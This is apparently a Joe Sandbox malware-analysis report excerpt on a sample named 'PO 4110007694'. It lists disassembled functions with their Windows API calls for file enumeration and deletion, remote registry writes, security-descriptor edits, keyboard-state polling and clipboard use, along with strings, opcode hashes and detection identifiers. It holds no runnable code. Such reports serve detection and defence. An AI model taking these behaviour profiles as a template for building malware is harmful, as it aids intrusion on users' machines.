                                                                    • _wcscmp.LIBCMT ref: 00C7EFCB
                                                                    • _wcscmp.LIBCMT ref: 00C7EFE2
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00C7EFF4
                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00C7F00E
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00C7F026
                                                                    • FindClose.KERNEL32(00000000), ref: 00C7F031
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00C7F04D
                                                                    • _wcscmp.LIBCMT ref: 00C7F074
                                                                    • _wcscmp.LIBCMT ref: 00C7F08B
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00C7F09D
                                                                    • SetCurrentDirectoryW.KERNEL32(00CC8920), ref: 00C7F0BB
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C7F0C5
                                                                    • FindClose.KERNEL32(00000000), ref: 00C7F0D2
                                                                    • FindClose.KERNEL32(00000000), ref: 00C7F0E4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                    • String ID: *.*
                                                                    • API String ID: 1803514871-438819550
                                                                    • Opcode ID: 7d9f6de67ab8beab25995f8f61f8e82d295c949b1d9f89cefbeb05ab3a10baf3
                                                                    • Instruction ID: b0d100b15f463f1c4a3f769531ec4ad66dc48bce33299448fb6d78026675da53
                                                                    • Opcode Fuzzy Hash: 7d9f6de67ab8beab25995f8f61f8e82d295c949b1d9f89cefbeb05ab3a10baf3
                                                                    • Instruction Fuzzy Hash: 0031C3325012186BDB14AFB4DC8DFEE77ACAF48360F14817AE818D21A1DB70DB46DA61
                                                                    Function 00C90857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C90953
                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00C9F910,00000000,?,00000000,?,?), ref: 00C909C1
                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00C90A09
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00C90A92
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00C90DB2
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C90DBF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Close$ConnectCreateRegistryValue
                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                    • API String ID: 536824911-966354055
                                                                    • Opcode ID: 328d3fb9d88a06ffec29d75549119799e8fcce6df4947de6b96a86a6310317af
                                                                    • Instruction ID: eebcd1f39f1770776b18693cd4d6bdfa3c63c1eb7e7b24e3a51a839aecf6bb34
                                                                    • Opcode Fuzzy Hash: 328d3fb9d88a06ffec29d75549119799e8fcce6df4947de6b96a86a6310317af
                                                                    • Instruction Fuzzy Hash: CF029E756006019FDB14EF14C895E6AB7E5FF8A710F14855CF89A9B3A2CB30EE41EB81
                                                                    Function 00C7F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00C7F113
                                                                    • _wcscmp.LIBCMT ref: 00C7F128
                                                                    • _wcscmp.LIBCMT ref: 00C7F13F
                                                                      • Part of subcall function 00C74385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C743A0
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00C7F16E
                                                                    • FindClose.KERNEL32(00000000), ref: 00C7F179
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00C7F195
                                                                    • _wcscmp.LIBCMT ref: 00C7F1BC
                                                                    • _wcscmp.LIBCMT ref: 00C7F1D3
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00C7F1E5
                                                                    • SetCurrentDirectoryW.KERNEL32(00CC8920), ref: 00C7F203
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C7F20D
                                                                    • FindClose.KERNEL32(00000000), ref: 00C7F21A
                                                                    • FindClose.KERNEL32(00000000), ref: 00C7F22C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                    • String ID: *.*
                                                                    • API String ID: 1824444939-438819550
                                                                    • Opcode ID: 297a8a220c3fc8c1bcaafd29c092daa25ceef9e8d543e22874a937f8d7f85b57
                                                                    • Instruction ID: a0fa86ef0fc6ea36a102ea368267b82decd04400b448fd972288f02da7bab3c4
                                                                    • Opcode Fuzzy Hash: 297a8a220c3fc8c1bcaafd29c092daa25ceef9e8d543e22874a937f8d7f85b57
                                                                    • Instruction Fuzzy Hash: 0D31C536500219ABDB14AFB4EC89FEE77AC9F45360F14817AE818E20A1DB30DF46DA54
                                                                    Function 00C7A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C7A20F
                                                                    • __swprintf.LIBCMT ref: 00C7A231
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C7A26E
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C7A293
                                                                    • _memset.LIBCMT ref: 00C7A2B2
                                                                    • _wcsncpy.LIBCMT ref: 00C7A2EE
                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C7A323
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00C7A32E
                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00C7A337
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00C7A341
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                    • String ID: :$\$\??\%s
                                                                    • API String ID: 2733774712-3457252023
                                                                    • Opcode ID: b100c8700425414d25a74d9f505520a46680f00fcd4d481737dc30629c4c5368
                                                                    • Instruction ID: 0d268509504b66f407b013a59d2c2a73bc1fce52d43193fcb1052af953302de2
                                                                    • Opcode Fuzzy Hash: b100c8700425414d25a74d9f505520a46680f00fcd4d481737dc30629c4c5368
                                                                    • Instruction Fuzzy Hash: 62319EB1904109ABDB219FA0DC49FEF77BCEF88740F1041BAF919D2161EB7497458B25
                                                                    Function 00C67CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C68202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C6821E
                                                                      • Part of subcall function 00C68202: GetLastError.KERNEL32(?,00C67CE2,?,?,?), ref: 00C68228
                                                                      • Part of subcall function 00C68202: GetProcessHeap.KERNEL32(00000008,?,?,00C67CE2,?,?,?), ref: 00C68237
                                                                      • Part of subcall function 00C68202: HeapAlloc.KERNEL32(00000000,?,00C67CE2,?,?,?), ref: 00C6823E
                                                                      • Part of subcall function 00C68202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C68255
                                                                      • Part of subcall function 00C6829F: GetProcessHeap.KERNEL32(00000008,00C67CF8,00000000,00000000,?,00C67CF8,?), ref: 00C682AB
                                                                      • Part of subcall function 00C6829F: HeapAlloc.KERNEL32(00000000,?,00C67CF8,?), ref: 00C682B2
                                                                      • Part of subcall function 00C6829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C67CF8,?), ref: 00C682C3
                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C67D13
                                                                    • _memset.LIBCMT ref: 00C67D28
                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C67D47
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00C67D58
                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00C67D95
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C67DB1
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00C67DCE
                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C67DDD
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00C67DE4
                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C67E05
                                                                    • CopySid.ADVAPI32(00000000), ref: 00C67E0C
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C67E3D
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C67E63
                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C67E77
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                    • String ID:
                                                                    • API String ID: 3996160137-0
                                                                    • Opcode ID: 5eaaf1b9b04399048e6cd454baae13b7b61805a573409c589740f3d169658e7d
                                                                    • Instruction ID: 2a96c9d185623ff89dd51e28fd15b95a175177e446463475868b1cffe7b43032
                                                                    • Opcode Fuzzy Hash: 5eaaf1b9b04399048e6cd454baae13b7b61805a573409c589740f3d169658e7d
                                                                    • Instruction Fuzzy Hash: 18615E71904109AFDF10DFA4DC85AEEBB79FF04704F14866AF825E6291DB319A16CB60
                                                                    Function 00C266E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                    • API String ID: 0-4052911093
                                                                    • Opcode ID: 2c0bf8b1a6f388dd16fb709e70b49056bf5444da8c24333efd57fc45b81a44f1
                                                                    • Instruction ID: 2b8769ccf6cd5dc1a5c81dc2d2f2f37c5c4b0d775384f8cf0e68cbc1b8f50bc1
                                                                    • Opcode Fuzzy Hash: 2c0bf8b1a6f388dd16fb709e70b49056bf5444da8c24333efd57fc45b81a44f1
                                                                    • Instruction Fuzzy Hash: 0D729375E00229CBDF24CF59D8807AEB7B5FF44310F18816AE816EB690DB309E81DB90
                                                                    Function 00C7001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 00C70097
                                                                    • SetKeyboardState.USER32(?), ref: 00C70102
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00C70122
                                                                    • GetKeyState.USER32(000000A0), ref: 00C70139
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00C70168
                                                                    • GetKeyState.USER32(000000A1), ref: 00C70179
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00C701A5
                                                                    • GetKeyState.USER32(00000011), ref: 00C701B3
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00C701DC
                                                                    • GetKeyState.USER32(00000012), ref: 00C701EA
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00C70213
                                                                    • GetKeyState.USER32(0000005B), ref: 00C70221
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: 1b35fb8971482fd8a7603812848adb11f77eef5c330ea3fb402bacfdb2aef2ca
                                                                    • Instruction ID: 9c33aa253cf5de62d2a507ccad2706161718b8885957b115b4978452b1f624bb
                                                                    • Opcode Fuzzy Hash: 1b35fb8971482fd8a7603812848adb11f77eef5c330ea3fb402bacfdb2aef2ca
                                                                    • Instruction Fuzzy Hash: FD511C30904388A9FB35DBB088557EEBFB49F01380F58C59ED9DA561C3DAA49B8CC761
                                                                    Function 00C903DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C8FDAD,?,?), ref: 00C90E31
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C904AC
                                                                      • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                      • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C9054B
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C905E3
                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00C90822
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C9082F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 1240663315-0
                                                                    • Opcode ID: f32ed2fba6f58c0d2b52bdbd613557ab0292f60709100ca840d060d7d7c60620
                                                                    • Instruction ID: d62c31c59639c07070e798e71a2cd469b87051a57050ad25fcff7533c89343d6
                                                                    • Opcode Fuzzy Hash: f32ed2fba6f58c0d2b52bdbd613557ab0292f60709100ca840d060d7d7c60620
                                                                    • Instruction Fuzzy Hash: D0E15E31204214AFCB14DF24C895E6ABBF8EF89314F14856DF85ADB2A2DB30ED41DB91
                                                                    Function 00C84164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                    • String ID:
                                                                    • API String ID: 1737998785-0
                                                                    • Opcode ID: 407ab508c16f9f10058aaed65f506d0bcd8af4ae9f0a037fbdb1ed65d2309a05
                                                                    • Instruction ID: ef64fc2ee9a83592f7400b3c45776aa1c88eec94a25a0ffa927fe72b205f8741
                                                                    • Opcode Fuzzy Hash: 407ab508c16f9f10058aaed65f506d0bcd8af4ae9f0a037fbdb1ed65d2309a05
                                                                    • Instruction Fuzzy Hash: 8021C1352006119FEB14AF24EC5DBAE7BA8FF05715F10802AF946DB2B1DB30AD42DB58
                                                                    Function 00C737EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C14743,?,?,00C137AE,?), ref: 00C14770
                                                                      • Part of subcall function 00C74A31: GetFileAttributesW.KERNEL32(?,00C7370B), ref: 00C74A32
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00C738A3
                                                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00C7394B
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00C7395E
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00C7397B
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C7399D
                                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00C739B9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                    • String ID: \*.*
                                                                    • API String ID: 4002782344-1173974218
                                                                    • Opcode ID: 7c4523257cf51013da749aec5ff8f5d987deaba718186743518ec8b302748035
                                                                    • Instruction ID: bf65a899d5ecade7e9b1833911a7876bdd41af337a6daa7033ae4f9c58d4c6dc
                                                                    • Opcode Fuzzy Hash: 7c4523257cf51013da749aec5ff8f5d987deaba718186743518ec8b302748035
                                                                    • Instruction Fuzzy Hash: FB518E3180518CEACF05EBA0D9929EDB779AF15300F608169F41AB7191EF316F4AFB61
                                                                    Function 00C7F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00C7F440
                                                                    • Sleep.KERNEL32(0000000A), ref: 00C7F470
                                                                    • _wcscmp.LIBCMT ref: 00C7F484
                                                                    • _wcscmp.LIBCMT ref: 00C7F49F
                                                                    • FindNextFileW.KERNEL32(?,?), ref: 00C7F53D
                                                                    • FindClose.KERNEL32(00000000), ref: 00C7F553
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                    • String ID: *.*
                                                                    • API String ID: 713712311-438819550
                                                                    • Opcode ID: c226064690212fbf00d7f2815a8cc248dff01788958924b3dd792f5e19a7849f
                                                                    • Instruction ID: 2f45c2fcb38b6252fc2b93efc5e5c8080cf79afa2020127724f4ccb1f59c7966
                                                                    • Opcode Fuzzy Hash: c226064690212fbf00d7f2815a8cc248dff01788958924b3dd792f5e19a7849f
                                                                    • Instruction Fuzzy Hash: F341517190021D9FCF54DF64DC89AEEBBB4FF05314F14856AE829A3191DB309A86EB50
                                                                    Function 00C25760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID:
                                                                    • API String ID: 4104443479-0
                                                                    • Opcode ID: 522998ea52af0e300c8b4187917a38884dddb6065a2189614b00da5c76b7e019
                                                                    • Instruction ID: 53f9bb03c8bff162a031cece1b40f345e199ad600faa7d34cc8a4c6b1882a2af
                                                                    • Opcode Fuzzy Hash: 522998ea52af0e300c8b4187917a38884dddb6065a2189614b00da5c76b7e019
                                                                    • Instruction Fuzzy Hash: 5C129870A00619EFDF14DFA5D981AEEB3F5FF48300F204529E846A7290EB36AE55DB50
                                                                    Function 00C73B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C14743,?,?,00C137AE,?), ref: 00C14770
                                                                      • Part of subcall function 00C74A31: GetFileAttributesW.KERNEL32(?,00C7370B), ref: 00C74A32
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00C73B89
                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C73BD9
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C73BEA
                                                                    • FindClose.KERNEL32(00000000), ref: 00C73C01
                                                                    • FindClose.KERNEL32(00000000), ref: 00C73C0A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
